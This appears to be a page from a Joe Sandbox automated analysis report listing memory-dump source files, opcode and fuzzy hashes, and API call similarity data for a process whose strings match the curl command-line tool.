                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _errno$strlenstrtol
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2305599799-0
                                                                                                                                                                                                                                                            • Opcode ID: 462f1a7dcaa2e51cfeb07eba6955f18fc2440b19ac037b655d9f0e98070404e8
                                                                                                                                                                                                                                                            • Instruction ID: efa8b64bb7752989b4ae085aa214d2a6d4af919b9d6970fd31503d3b330f7a88
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 462f1a7dcaa2e51cfeb07eba6955f18fc2440b19ac037b655d9f0e98070404e8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF0F0F2A043056FDB147E19ACC2B6B378CDB91724F0A0079FA4987381E5719C1883B6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fclosefree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 271167838-0
                                                                                                                                                                                                                                                            • Opcode ID: b2905a272aa7d97a52e4df7438944baecb9134ab2fc63fd6c38e1289b447822e
                                                                                                                                                                                                                                                            • Instruction ID: 4d931e0072cb14e0d6f71f3449d786cb52bba96f82fb1ecfd4b860c3ae1dd3bd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2905a272aa7d97a52e4df7438944baecb9134ab2fc63fd6c38e1289b447822e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D014BF0800B008BEB34AF25E905703B6E0AF14708F041D6DE48606A91E37AF5A8CF56
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfree
                                                                                                                                                                                                                                                            • String ID: SRP
                                                                                                                                                                                                                                                            • API String ID: 1865132094-1918707673
                                                                                                                                                                                                                                                            • Opcode ID: 36ed784f995cd238b7ba2eebbf2b13347e2c94a17512458cb50e5cba0265e255
                                                                                                                                                                                                                                                            • Instruction ID: bb44375f1695fe5009c9e42e4f263293898a015dfcc2b965aa9be0b56f508124
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36ed784f995cd238b7ba2eebbf2b13347e2c94a17512458cb50e5cba0265e255
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C71191F0A24342CFEB14CF29D844B6677E1AB94314F14457AF849DF281DA78DD22CB62
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfree
                                                                                                                                                                                                                                                            • String ID: list
                                                                                                                                                                                                                                                            • API String ID: 1865132094-1154021400
                                                                                                                                                                                                                                                            • Opcode ID: b75053381a8bf9279ad512e0cde3a56e2b22e1c1088a7e9a1c6d7c2062b4de18
                                                                                                                                                                                                                                                            • Instruction ID: 7745fa08f46fa29411eb6531f8bae470bd2da19535e8e27c95799bca53bca675
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b75053381a8bf9279ad512e0cde3a56e2b22e1c1088a7e9a1c6d7c2062b4de18
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2811A1F0A283018BDB94DE28D845BAA73E5AB80318F18057AF499DF2C1DB75DC71CB52
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • --trace-ascii overrides an earlier trace/verbose option, xrefs: 002375A3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfree
                                                                                                                                                                                                                                                            • String ID: --trace-ascii overrides an earlier trace/verbose option
                                                                                                                                                                                                                                                            • API String ID: 1865132094-2002733778
                                                                                                                                                                                                                                                            • Opcode ID: a326bd7e025b2fa9c42568be6610559df1b0393986e460a32de4d28a832a53d6
                                                                                                                                                                                                                                                            • Instruction ID: 2fd83e5df404bc6162c03ea45db325d3167d9464a9ee0bc6e3055f41c4093f38
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a326bd7e025b2fa9c42568be6610559df1b0393986e460a32de4d28a832a53d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61118EF06242468BDB24DF29D846B6AB3F1FF80358F140569F8599B680DB34ED71CB92
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • -v, --verbose overrides an earlier trace/verbose option, xrefs: 0023674C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfree
                                                                                                                                                                                                                                                            • String ID: -v, --verbose overrides an earlier trace/verbose option
                                                                                                                                                                                                                                                            • API String ID: 1865132094-440421925
                                                                                                                                                                                                                                                            • Opcode ID: 8cf32f21a2cc1f6fd906ed2dfb11aa3b990e7290ca5c0d8b5707ac660c1be2d6
                                                                                                                                                                                                                                                            • Instruction ID: eea4e841c9108649ab0f5f678f735906a399f428dbe16519d573679ce90ffa1a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cf32f21a2cc1f6fd906ed2dfb11aa3b990e7290ca5c0d8b5707ac660c1be2d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD11BCF06202069FDB14CF08D945B9AB7E0FB84318F144569F8089B2A0CB74EDB1CB92
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • --trace overrides an earlier trace/verbose option, xrefs: 00237540
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfree
                                                                                                                                                                                                                                                            • String ID: --trace overrides an earlier trace/verbose option
                                                                                                                                                                                                                                                            • API String ID: 1865132094-4096414138
                                                                                                                                                                                                                                                            • Opcode ID: 26dcf7cc72af34aad375f86871f0235917046bae2d1a223a8ecf28bb20ed8a89
                                                                                                                                                                                                                                                            • Instruction ID: 97e95653d9b59ed4cb6cc851e148fe5228700561251984317cfb9baf6ad9d162
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26dcf7cc72af34aad375f86871f0235917046bae2d1a223a8ecf28bb20ed8a89
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D611CEB06242068BDB14DF29D84575AB3F1BF80318F040169F809AB280CB34EDB1CB92
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfree
                                                                                                                                                                                                                                                            • String ID: a
                                                                                                                                                                                                                                                            • API String ID: 1865132094-3904355907
                                                                                                                                                                                                                                                            • Opcode ID: 83195d2a79240eec1e44ec34a1e8ff27cb449eafe9515311122cdc77073cbc21
                                                                                                                                                                                                                                                            • Instruction ID: ca127d5c62c9055976419d5674e783e0182e9c7d1ae6ec7a8f19c872136f5bf4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83195d2a79240eec1e44ec34a1e8ff27cb449eafe9515311122cdc77073cbc21
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B118EF06283428BEB54DF18D4487AA77E1BB40348F184569F4599F2C1DB76CCA2CB42
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfree
                                                                                                                                                                                                                                                            • String ID: SRP
                                                                                                                                                                                                                                                            • API String ID: 1865132094-1918707673
                                                                                                                                                                                                                                                            • Opcode ID: 7373e108d7546f3fb890b60e97500f4941218d6cb612208e7bf0611ae1e9ae26
                                                                                                                                                                                                                                                            • Instruction ID: 97ed30f1885e0668840e38d951cab3a40f8f1d45b9b50ef62cb21dbef540daf0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7373e108d7546f3fb890b60e97500f4941218d6cb612208e7bf0611ae1e9ae26
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F01A2F1B2034187EB48CE24DC45BA637949B90344F14447AFC0ADF241EA79D9768791
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • curl: , xrefs: 00239DFB
                                                                                                                                                                                                                                                            • curl: try 'curl --help' or 'curl --manual' for more information, xrefs: 00239E15
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fwrite
                                                                                                                                                                                                                                                            • String ID: curl: $curl: try 'curl --help' or 'curl --manual' for more information
                                                                                                                                                                                                                                                            • API String ID: 3559309478-456511577
                                                                                                                                                                                                                                                            • Opcode ID: 0ab1b0670a47f5af18dfd1a0afced820faee376321798b6402ee01ed36aac9e3
                                                                                                                                                                                                                                                            • Instruction ID: fdf62e8767bd54da8b983897a7a1b7a35b4b4fa383e7b79feb3e0a92c0eaf207
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab1b0670a47f5af18dfd1a0afced820faee376321798b6402ee01ed36aac9e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02E0D87590421177C524EE04BC06F8F7BA9DFC1B50F05081AF84463342F261566585BB
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strchr$strlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 842768466-0
                                                                                                                                                                                                                                                            • Opcode ID: 355cced4d9cf2756526a275c354e961f1d53715a580204d687aca74816b8d9c9
                                                                                                                                                                                                                                                            • Instruction ID: 3ff81ea275758e2bcd3cff5c7f159f771d7ff11b8f82f1d3f1f652927d964a39
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 355cced4d9cf2756526a275c354e961f1d53715a580204d687aca74816b8d9c9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 391106E2D2036353EA202D7A2C95BAB3ADC4F52385F2C05F5ECC5EB202F619C9784275
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strchrstrcmpstrlenstrncmp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1049578524-0
                                                                                                                                                                                                                                                            • Opcode ID: 15e8ddf9967e2b30b35ef92b2c9ba3521b54e5e5c53940913f64d1ac1fcac46e
                                                                                                                                                                                                                                                            • Instruction ID: 118ff49fc837e2ddce7ea141e25bc69ef04cef99f13af7fc1020ac24c04d8dd4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15e8ddf9967e2b30b35ef92b2c9ba3521b54e5e5c53940913f64d1ac1fcac46e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B911D371B143079BEF34AE658C84BA7B798BF85364F0A452DEC8887205F731E921C6A1
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?,?,?,00000000,004BC439), ref: 004BC267
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,00000000,004BC439), ref: 004BC298
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterSectionSleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3080175056-0
                                                                                                                                                                                                                                                            • Opcode ID: 75b0693db51bc74fb7814e04d092f2197517a75f920c02d763febf4082ca88d1
                                                                                                                                                                                                                                                            • Instruction ID: daaf6d7f39c52f0a89f5a24e3f85e0b6c762d3ee175ebde58db90ecebb5818ba
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75b0693db51bc74fb7814e04d092f2197517a75f920c02d763febf4082ca88d1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 471170B18041518BDB14ABB8A8C619B36E0FB25350F56056BCC46D7320E739D898DFAB
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
